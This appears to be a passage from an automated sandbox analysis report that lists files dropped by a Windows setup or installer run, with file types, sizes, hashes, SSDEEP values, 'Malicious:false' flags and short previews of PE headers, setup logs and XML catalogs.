                                                                                                                      Malicious:false
                                                                                                                      Preview:.2024-12-29 07:39:09, Error MOUPG CInstallUI::GetDefaultLanguage(2027): Result = 0x80070002[gle=0x00000002]..2024-12-29 07:41:25, Error MOUPG Bits Error: Fatal = [Yes], State = [TransientError], Error_Context = [BG_ERROR_CONTEXT_REMOTE_FILE], hr = [0x80072EE7], Description = [The server name or address could not be resolved..] [gle=0x000036b7]..2024-12-29 07:41:25, Error MOUPG Bits Error: File [http://dl.delivery.mp.microsoft.com/filestreamingservice/files/c8ba26f0-72f8-44df-80df-cfad71e9abeb/19045.3803.231204-0204.22h2_release_svc_refresh_CLIENTCONSUMER_RET_x64FRE_en-gb.esd] => [C:\ESD\Download\installx64.esd][gle=0x000036b7]..
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):0.9948677314094648
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:SFXW+dQuBugcuC2na5TaTUd90PzY+anYA7K:SFXW+dQuBugcuC79xd0ZAW
                                                                                                                      MD5:DFDA42DDC910218BDCD8246B566929A2
                                                                                                                      SHA1:A3396C49A37FEFC5EAD260E5CA8516F5720B846A
                                                                                                                      SHA-256:71E4CCBE210E774BC3B1AD0B74F7C30717582C5B08A088E7A1A6B2D2FF329B07
                                                                                                                      SHA-512:99B8A3829C1E055351C984A7F695D10F03BAA2EA38132C339E9A8F8AA5FDB6ECF25CC07926636DACF52444E2824EE837C75D933A568E744BD7237466E9B3DD29
                                                                                                                      Malicious:false
                                                                                                                      Preview:..<.W.I.N.D.L.P.>..... . .<.S.t.a.t.e.>.0.<./.S.t.a.t.e.>..... . .<.T.a.s.k.C.o.u.n.t.>.2.<./.T.a.s.k.C.o.u.n.t.>..... . .<.W.o.r.k.i.n.g.P.a.t.h.>.C.:.\.$.W.i.n.d.o.w.s...~.W.S.\.S.o.u.r.c.e.s.\.P.a.n.t.h.e.r.<./.W.o.r.k.i.n.g.P.a.t.h.>..... . .<.S.t.r.i.n.g.C.o.u.n.t.>.7.<./.S.t.r.i.n.g.C.o.u.n.t.>..... . .<.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . . . .<.N.a.m.e.>.T.e.l.#.A.s.m.v.\.W.u.I.d.<./.N.a.m.e.>..... . . . .<.V.a.l.u.e.>.0.9.7.c.7.7.f.b.-.5.d.5.d.-.4.8.6.8.-.8.6.0.b.-.0.9.f.4.e.5.b.5.0.a.5.3.<./.V.a.l.u.e.>..... . .<./.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . .<.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . . . .<.N.a.m.e.>.H.o.s.t.O.S.B.r.a.n.c.h.N.a.m.e.<./.N.a.m.e.>..... . . . .<.V.a.l.u.e.>.v.b._.r.e.l.e.a.s.e.<./.V.a.l.u.e.>..... . .<./.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . .<.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . . . .<.N.a.m.e.>.T.e.l.#.A.s.m.v.\.W.e.b.S.e.t.u.p.O.n.l.i.n.e.S.t.o.r.e.V.e.r.s.i.o.n.<./.N.a.m.e.>..... . . . .<.V.a.l.u.e.>.1...4...1.<./.V.a.l.u.e.>..... . .<./.S.t.r.i.n.g.
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):0.9948677314094648
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:SFXW+dQuBugcuC2na5TaTUd90PzY+anYA7K:SFXW+dQuBugcuC79xd0ZAW
                                                                                                                      MD5:DFDA42DDC910218BDCD8246B566929A2
                                                                                                                      SHA1:A3396C49A37FEFC5EAD260E5CA8516F5720B846A
                                                                                                                      SHA-256:71E4CCBE210E774BC3B1AD0B74F7C30717582C5B08A088E7A1A6B2D2FF329B07
                                                                                                                      SHA-512:99B8A3829C1E055351C984A7F695D10F03BAA2EA38132C339E9A8F8AA5FDB6ECF25CC07926636DACF52444E2824EE837C75D933A568E744BD7237466E9B3DD29
                                                                                                                      Malicious:false
                                                                                                                      Preview:..<.W.I.N.D.L.P.>..... . .<.S.t.a.t.e.>.0.<./.S.t.a.t.e.>..... . .<.T.a.s.k.C.o.u.n.t.>.2.<./.T.a.s.k.C.o.u.n.t.>..... . .<.W.o.r.k.i.n.g.P.a.t.h.>.C.:.\.$.W.i.n.d.o.w.s...~.W.S.\.S.o.u.r.c.e.s.\.P.a.n.t.h.e.r.<./.W.o.r.k.i.n.g.P.a.t.h.>..... . .<.S.t.r.i.n.g.C.o.u.n.t.>.7.<./.S.t.r.i.n.g.C.o.u.n.t.>..... . .<.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . . . .<.N.a.m.e.>.T.e.l.#.A.s.m.v.\.W.u.I.d.<./.N.a.m.e.>..... . . . .<.V.a.l.u.e.>.0.9.7.c.7.7.f.b.-.5.d.5.d.-.4.8.6.8.-.8.6.0.b.-.0.9.f.4.e.5.b.5.0.a.5.3.<./.V.a.l.u.e.>..... . .<./.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . .<.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . . . .<.N.a.m.e.>.H.o.s.t.O.S.B.r.a.n.c.h.N.a.m.e.<./.N.a.m.e.>..... . . . .<.V.a.l.u.e.>.v.b._.r.e.l.e.a.s.e.<./.V.a.l.u.e.>..... . .<./.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . .<.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . . . .<.N.a.m.e.>.T.e.l.#.A.s.m.v.\.W.e.b.S.e.t.u.p.O.n.l.i.n.e.S.t.o.r.e.V.e.r.s.i.o.n.<./.N.a.m.e.>..... . . . .<.V.a.l.u.e.>.1...4...1.<./.V.a.l.u.e.>..... . .<./.S.t.r.i.n.g.
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2172728
                                                                                                                      Entropy (8bit):5.943926965774228
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:OeEbcHPcrJLItSNvtuu/YhSef7K/cjkXgaoo0NGG2Adj9DDIE/RYw:OVb2cRwyY4VXXEL2GjBIQYw
                                                                                                                      MD5:55A4344E76136460BE2C8547C38567B4
                                                                                                                      SHA1:83400B9A3BC4F1D935258A80B3E7636BAAA618CB
                                                                                                                      SHA-256:A9AC64EC515D04589DFC38B25D68D01F281BBB794D0DF9EC4205FE473703AEF5
                                                                                                                      SHA-512:A8AD61CAF69891EE31C48401EC87D3BB92DB5E64C9FE878EE33E072FD6E5406DB9A747485D1CF93F615072E6C565C36715700571DCD974C6EB7A76A7630D0F43
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.S.x.=.x.=.x.=.l.>.s.=.l.9.i.=.x.<.;.=.l.<.[.=.l.8.q.=.l.=.y.=.l.4.m.=.l...y.=.l.?.y.=.Richx.=.........................PE..L....7t\...........-.........R...............................................@!......o!...@A...........................R....6..h....p..X.............!.8!...@ .d.......T...................|..........@............0...............................text...B........................... ..`.data....e.......V..................@....idata...0...0...2..................@..@.rsrc........p.......<..............@..@.reloc..d....@ ....... .............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):699192
                                                                                                                      Entropy (8bit):6.488335450528499
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:aoBJUei8NJTRJUrJJMOy2pWShbJAnpRj5pcRpGbov5IUfiHrCOTmfVjRagSPD:jBJUj8NJTRJUVJN59VjwbPD
                                                                                                                      MD5:A5D94F9587F97E9C674447447721B77F
                                                                                                                      SHA1:1C130F95C82AB28A4A11A7ED41EB9EA9F613A339
                                                                                                                      SHA-256:F33E7BCE0CA712BAAC95557823096F929F78927E521C0448ED237F429141EFD9
                                                                                                                      SHA-512:E5E35480A489B0F63A2938A1C4EA19ACA197A16020BB330662B62E98759FB5F7B6056416DC1D8894E433607C5B4FB3E7AE61F0D2FA3C7455DD000916EC3D5D62
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........bn.............h.......h.......h.......h..........{....h..)....h.......h......Rich............................PE..L.....\e................. ..........P........0....@.................................<.....@...... .......................... v..,.......H...............8!...p..|e.. ...T....................2.......1..@............p...............................text............ .................. ..`.data....?...0.......$..............@....idata...)...p...*...2..............@..@.rsrc...H............\..............@..@.reloc..|e...p...f...$..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):747320
                                                                                                                      Entropy (8bit):6.582241479326702
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:yMv8NZ0L0YEgAt2dBVtnliFAAF02WPy6e5W7JrAa3vpz/VXGGT3m/YvZ0YPej/O8:yMv6q0YEgAt2RtnliFAW0jPG5wXJSDjf
                                                                                                                      MD5:59D1A173F6B27A8A1CC367CA9FF6E560
                                                                                                                      SHA1:15B2C60011D97B99C4CD2EEDB62CCAB14D748DF6
                                                                                                                      SHA-256:45C2EE2387026A50F0C6B9C9119F39B6D2B6505312DBDF352399FD41E8DEB78F
                                                                                                                      SHA-512:A14D89FCF4964F7929936A16C0EF9D4896D14913B3E5BC050CD7044A1A0DA50E58520DE80A7966832F514365D031012D0E1829CD7B93D1B547812F8ABBCF7557
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........M6..,X\.,X\.,X\.D[].,X\.G[].,X\.G\].,X\.,Y\*-X\.GY].,X\.G]].,X\.GX].,X\.GQ].,X\.G.\.,X\.GZ].,X\Rich.,X\........................PE..L....B.............-................@+...............................................{....@A............................Q.......@....0...............F..8!...@...f......T...............................@............................................text.............................. ..`.data...(P..........................@....idata..x........ ..................@..@.rsrc........0......................@..@.reloc...f...@...h..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1165624
                                                                                                                      Entropy (8bit):6.458049440050692
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:sHChbi7VH3Cg3G49W4qjbuK5nwTShiPGm/ap:Bhbi7VHSCGF7wTDOzp
                                                                                                                      MD5:6F12BA2D5CB564F73D9813D105E5C1FE
                                                                                                                      SHA1:B634E34149F99F4336EFC0C5DE5E850C61BE48E1
                                                                                                                      SHA-256:26B66B81267DFDA7A78890F20A4ED0D104DB1CD350D2D9F649FDB496B6C11333
                                                                                                                      SHA-512:4462F38B0A4ECA1D09EB747853CC15C804E2E42E91812604A0AEF25DE06D5FA5A5A4D79731AEB462F61ED46D63DD904D0A943919AABD5ADB771F94C63E6A175A
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):888632
                                                                                                                      Entropy (8bit):6.878236449249567
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:snR+vEwcJsaaiaYZC1vLDQf8vdJy+X1LQpOd+:4zw7aaiaYZCj5vdJy+XhUOd+
                                                                                                                      MD5:A54F45A9013251F0DDD91C6B3AB18449
                                                                                                                      SHA1:D2AF46EEDBF3E5024F54D81CD062F8AA4C9B77D8
                                                                                                                      SHA-256:40A97484CE8E06658EA02AF3E3B0077C47BA8D71C2D991EB69B94F221C78478F
                                                                                                                      SHA-512:02C4784F02537247134EA17B508CBD3E5B0C6CEA943EF0143EC9708652C85C255E115A603EB337E515AB00FE6526CD5D83D560D987FFE7D1BA612A6F125AD62D
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (65533), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):582696
                                                                                                                      Entropy (8bit):5.715631293469523
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:GeUJmDlHwVeCx2qTMTTnaP/d5/NbyBNiX4OOqd:GfARHwVeCx2qTMTTnaP/d5/NfJ
                                                                                                                      MD5:7D72243366184B4048A90AF77D63F21C
                                                                                                                      SHA1:4D1A0CB9CC75B1AC7DBEC285DA7B90FBC85B3892
                                                                                                                      SHA-256:A3471EB8DC2C3045E33EB48ABAEF4046EEEBBE30161A52F7056F68E479400823
                                                                                                                      SHA-512:A223ABBD4C3D3CDC6C1FE345E68613E0225B583D7C8705A89B3A9F91DEC96EC20428066830147642816B6B6628C7DEF368E89CC91D2378AA001CAB9E3BEE71F3
                                                                                                                      Malicious:false
                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?><rg:licenseGroup xmlns:rg="urn:mpeg:mpeg21:2003:01-REL-R-NS"><r:license xmlns:r="urn:mpeg:mpeg21:2003:01-REL-R-NS" licenseId="{06a4dd30-84b7-4fd2-b859-f1eddb0858f5}" xmlns:sx="urn:mpeg:mpeg21:2003:01-REL-SX-NS" xmlns:mx="urn:mpeg:mpeg21:2003:01-REL-MX-NS" xmlns:sl="http://www.microsoft.com/DRM/XrML2/SL/v2" xmlns:tm="http://www.microsoft.com/DRM/XrML2/TM/v2"><r:title>XrML 2.1 License - Product Key Configuration</r:title><r:issuer><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo><CanonicalizationMethod Algorithm="http://www.microsoft.com/xrml/lwc14n"/><SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/><Reference><Transforms><Transform Algorithm="urn:mpeg:mpeg21:2003:01-REL-R-NS:licenseTransform"/><Transform Algorithm="http://www.microsoft.com/xrml/lwc14n"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><DigestValue>AM88tJM/7qpuE9kzeYjkyRVvHkQ=</DigestValue></Reference></SignedI
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 44045 bytes, 1 file, at 0x2c +A "products.xml", ID 33800, number 1, 86 datablocks, 0x1503 compression
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):44045
                                                                                                                      Entropy (8bit):7.952743576629471
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:a7WxoIAiafX3+okXkCCn22+ZvEcKdH+u0eZfQEj7Mq6TFSguODDOLANYo:a6yIAVfX3EYn22+9vKow7MtFLu1LAN1
                                                                                                                      MD5:52B7D0637974ED697DD8AA819ED3C8B0
                                                                                                                      SHA1:E81A7094362964E9AE69580B91A1E72207BE667D
                                                                                                                      SHA-256:7677DD6247C5768737B643911894374939AAC5AE2DEA158C272511FDD2AC52BF
                                                                                                                      SHA-512:173A5893612A789F51EE9D914AE26E1FAEC557DCFAB4DDB8AA8C8BAA7690CA456AF117E14E2B6D004C963573CB67A02F0E2760CC8C609287587DC335F9C4C1A8
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2794793
                                                                                                                      Entropy (8bit):5.169002964366024
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:iqm6xDGaol3wdAZNRlKUp9Lq0T/vjXrOo/TpuIexzfDS8/jRCMRNoUosgFTkYKl1:dzfDS8/jRCMRNxyrcL/cGPjOAEg
                                                                                                                      MD5:F9C1DF5C8718468B892AF250F6D7B78E
                                                                                                                      SHA1:040DA263BC223436F929DBC1F2AB88198E299610
                                                                                                                      SHA-256:76FCC8EEACB7DA966441A7E0AC8B79CC095F13682ABB92EE5A614C52F72CE54C
                                                                                                                      SHA-512:EDEB708E50F815EF022BD9275255DD3644B07597E9A90736364FBB7206B77BA44953D61735DEF7E2653A12442FD623BAFF0630793B507ECCF4508E772BA02A39
                                                                                                                      Malicious:false
                                                                                                                      Preview:<MCT>.. <Catalogs>.. <Catalog version="1.4.1">.. <PublishedMedia id="" release="">.. <Files>.. <File id="">.. <FileName>19045.3803.231204-0204.22h2_release_svc_refresh_CLIENTCHINA_RET_x64FRE_zh-cn.esd</FileName>.. <LanguageCode>zh-cn</LanguageCode>.. <Language>Chinese (Simplified, China)</Language>.. <Edition>CoreCountrySpecific</Edition>.. <Architecture>x64</Architecture>.. <Size>3945834799</Size>.. <Sha1>8b49a8943cb3260ce9a8dadcd729f0ac98018245</Sha1>.. <FilePath>http://dl.delivery.mp.microsoft.com/filestreamingservice/files/6048ac73-c010-4eaf-ac07-a8672588662e/19045.3803.231204-0204.22h2_release_svc_refresh_CLIENTCHINA_RET_x64FRE_zh-cn.esd</FilePath>.. <Key />.. <Architecture_Loc>%ARCH_64%</Architecture_Loc>.. <Edition_Loc>%BASE_CHINA%</Edition_Loc>.. <IsRetailOnly>False</IsRetailOnly>.. </File>.. <File id="">.
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10452
                                                                                                                      Entropy (8bit):5.444136787913199
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:seqadKxSRlb3dY/e7sxzs7c6i19WO7hD26BV+btnQfz/:sjmTrq/e7s1vpMvoz/
                                                                                                                      MD5:033E7ADC314C248CC29A9F14906C21E5
                                                                                                                      SHA1:6B31F8A23514B4E98217CD05BE08E7967ECA7048
                                                                                                                      SHA-256:C40FDDBB16853406D12D30E01E170DE8474728BB8EC24794DB721DE0A7F67927
                                                                                                                      SHA-512:46B46D548F5A2269E886A9F6873D97549EEB92C7294114C62BAF7805AC423E4D3AA3A50CD7B3294BE03E22C271F6BEF1134ADF797D9F838962EF5B42E8ECD19E
                                                                                                                      Malicious:false
                                                                                                                      Preview:;..; This section describes the footprint dependencies..; of various platform sections..;..[Dependencies]..Basic =..Servicing = Basic..ICB = Basic, Servicing..Migration = Basic....;..; Each element in a footprint section can be one of three things:..; - File name: this must not ending in '\'...; - Folder name: this must end in '\'...; - File pattern pattern: these can contain wild cards...; These pattern should be one of the format..; accepted by FindFirstFile()...;......[Footprint.Basic]..diager.dll..diagtrack.dll..diagtrackrunner.exe..reagent.admx..reagent.dll..reagent.xml..setupplatform.cfg..setupplatform.dll..setupplatform.exe..unbcl.dll..wdsclientapi.dll..wdscore.dll..wdscsl.dll..wdsimage.dll..wdstptc.dll..wdsutil.dll..WinSetupBoot.sys..WinSetupBoot.hiv....[Footprint.Basic.Delayed]..*-*\reagent.adml..*-*\reagent.dll.mui..*-*\setupplatform.exe.mui..*-*\wdsimage.dll.mui..du.dll..ReserveManager.dll......[Footprint.Servicing]..dismapi.dll..dismcore.dll..dismcoreps.dll..dis
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):7203144
                                                                                                                      Entropy (8bit):6.701114300776759
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:FsA91crphY6bcvsNZSI/mbuhfuCK4Q4Rus1T+nfIqBpxlpcLy/Wuac7KA2:iA98pSg3ZHLusB+nF1/dS
                                                                                                                      MD5:0DB2EB7B159D7289DFBDF3CA29D44704
                                                                                                                      SHA1:57A9AA7409A9040A701855BF610F68E5A9CFEA24
                                                                                                                      SHA-256:CBEEC25C578F4E8EAE81BB8829C3B7BC81648DA6F63EEB4A606B9A66660D6D91
                                                                                                                      SHA-512:8EADA149F0C90DF794D26EFE8AF2C90DF1B8172B33CCC6639F3F1A18671AA34493A6D466B4BF2357075094BC13129E5001623B2388C39ED6FA4239B4E9EF6328
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):835904
                                                                                                                      Entropy (8bit):6.6134747845607045
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:tFWowsrRqH5Euwb8naBgOMddILrWER0dDxAbti:tZRqHb1DILrfML
                                                                                                                      MD5:5D52A4EFAC5B4B7530B388AEB6F9CB67
                                                                                                                      SHA1:4B5D32A6CAECEC6E261F5BA7BAE392609A6A0F65
                                                                                                                      SHA-256:137ECA75B268556503E26CD5987DDDAC5EB0831ED4CE5EA3B0D34B5645A31ABD
                                                                                                                      SHA-512:F7F88C4229C97BF598F995CF31A8ADFF73089EF8D26143CC839A30D63221FB66B185E12AE20BC17F14712723BB20C34F6E546F6BE961164DEEAE268703322756
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):249288
                                                                                                                      Entropy (8bit):6.515585131330681
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:dwSCAMOtf9vjREEQytxZAAB8A866ZAbl3YKcNFsvGbxlVrFJp3qM95BZc61:LWAB8M5bl3YKcgvw1/
                                                                                                                      MD5:C8622591EA490127898FF612C4D0FCE8
                                                                                                                      SHA1:609B9A81D5CCBCAC62377EEEE95FF328DAEC3618
                                                                                                                      SHA-256:00436605B013E26F39B3FF6AAB1E5577FE6E4950C4C803D534D0BBD912B3F7E0
                                                                                                                      SHA-512:CBDF1828E892035F05554298480F0416AADBD83C5020EE02AB7FB13BD7B03418297632C7AADC4C82EF850C5E79B03F9044C86A3D5BE09DCB07C1834B90DB2F23
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):201528
                                                                                                                      Entropy (8bit):6.405403159422954
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:yZ3oXN1cvpP/YeJvuBLqAOAWgERCGwDlyxfb2g/4S/IAiN85McisT:KXvSLqAOAWgERCNI6g/4giN8KXsT
                                                                                                                      MD5:07F3FAC5518C90B22DFB9778EA280D0A
                                                                                                                      SHA1:6D20FF953A0C5AABC1970E80A5F96AEDD830DB9B
                                                                                                                      SHA-256:65467BF1FBF10C2A399FE532B780F3604FDA5B00DB8319787CB6867BEDE4B90E
                                                                                                                      SHA-512:F86447C3DD0AD11022B208BA04C7B62CDDF57B1035F4B1E18AAE3E6764B6DCE53FBEAA68CB5CE3AB75BA08293474DC18E9A3F5CE6DF43A01701ABD9180E07ACE
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):50504
                                                                                                                      Entropy (8bit):6.56063223965799
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:bvftzpTPMNBV4VJMZ/MZJ//3swsxsiM9gVP599:7ftNTENBVcMZW/3sjaiM9gVj9
                                                                                                                      MD5:0B778AD42D5E17CE89936F6D4C42957D
                                                                                                                      SHA1:DCC971675653547295AC4EE95E139A1CCA7A20C5
                                                                                                                      SHA-256:D5BCFDAB29EA1DEEA22679A4A4473A9CC84871A5D707C006EB99FACB4AF9081B
                                                                                                                      SHA-512:3AAF945A4735BC867AD4C4213EC43079B8B8FEF17CBAF3B394365762451E36F51075E7E129FC8DCBC847DC44501536309114B6C54A4D415D21D0459049E51026
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+.~\o...o...o...{...l...{...a...o.......{...p...{...i...{...n...{...w...{...n...{...n...Richo...........................PE..L....7............!........."......@.....................................................@A............................S..............0...............H!......P...P!..T...................D...........@............................................text...C........................... ..`.data...............................@....idata..............................@..@.rsrc...0...........................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):750032
                                                                                                                      Entropy (8bit):6.620521533851412
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:YuUi9cOIJAeMgC14k1BzD96/am+Bzqx8J8yh7Rb6bbYYcdacXgmr0zZkIvSzfqav:Ai9cOsMgC144vOe7RbibYZMcSsldT
                                                                                                                      MD5:B5D99819CB865C4DA4EBE8880F5ADA7E
                                                                                                                      SHA1:5BAD51BECB913F65ACC8B2DF912AC76A24F0834D
                                                                                                                      SHA-256:4ED57014301E91B0504E0C2A62F4EE969CCF4C179DE9788D1307DBC71186D543
                                                                                                                      SHA-512:5AC313784CB4AA3829AE59770049B27D3D50193B206CAD43C2D79BB7674766BE5199F4F76BE9854DF635DF2094E763CA61F14699D8538F62393F10C781FCCFB7
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........4...g...g...g...f...g...f...g...g4..g...f...g...f...g...f...g...f...g...g...g...f...gRich...g................PE..L...."n~...........!................Px..............................................yK....@A................................\...@....................P...!... ...m..0...T....................7.......7..@...............X............................text.............................. ..`.data...............................@....idata...$.......&..................@..@.rsrc...............................@..@.reloc...m... ...n..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):516032
                                                                                                                      Entropy (8bit):6.669254995489913
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:6ZTPK4dHSyYHxUpt3NIqct9awKFaLXDXjjf2Uxg8NcTki1NgLOi7TW/P2PxxQ:6FlJSbkt3yLXDXjjfF+L2nQ
                                                                                                                      MD5:7A020A931614E1A7CA1DB482D1C00EDE
                                                                                                                      SHA1:782FADD14783D0A10520294E4E69036ADB556E53
                                                                                                                      SHA-256:48EE94546C9345FBE5AD1A51F4826B131DA554A8E4395E5D22E4CDE09B3816D5
                                                                                                                      SHA-512:7DE656C091C95D91C6A78115BEB497AFD11FBCCB1B47D3F7557D0AB1D3E52EB2A2060E640222D445D6859A7C1813901653CC77BBA0D21E1DCB46AAA413A17430
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+..E..E..E...F..E...A..E..D.u.E...D..E...@..E...E..E...L.#.E....E...G..E.Rich.E.................PE..L....Ey7...........!.....N...x.......=.......`.......................................L....@A........................PZ..S....t..,.......(................!......<?..`...T...................|...........@............p...............................text....M.......N.................. ..`.data...D....`.......R..............@....idata..` ...p..."...V..............@..@.rsrc...(............x..............@..@.reloc..<?.......@...~..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):237384
                                                                                                                      Entropy (8bit):6.580668822713633
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:al6Ls7+dMPL25tZ1qeLkLY85pwkfLWdm7bS:Y2s7+dMPL8tZ/4s8PwkC/
                                                                                                                      MD5:818E76521DAD2369E8F713AECDA42145
                                                                                                                      SHA1:DF047D531B34433F5139BEAA886AF72136FD1537
                                                                                                                      SHA-256:EAB16299B69323FCA094F2D214A5BC5FBF973040B7CCD187415EDF985F46B21D
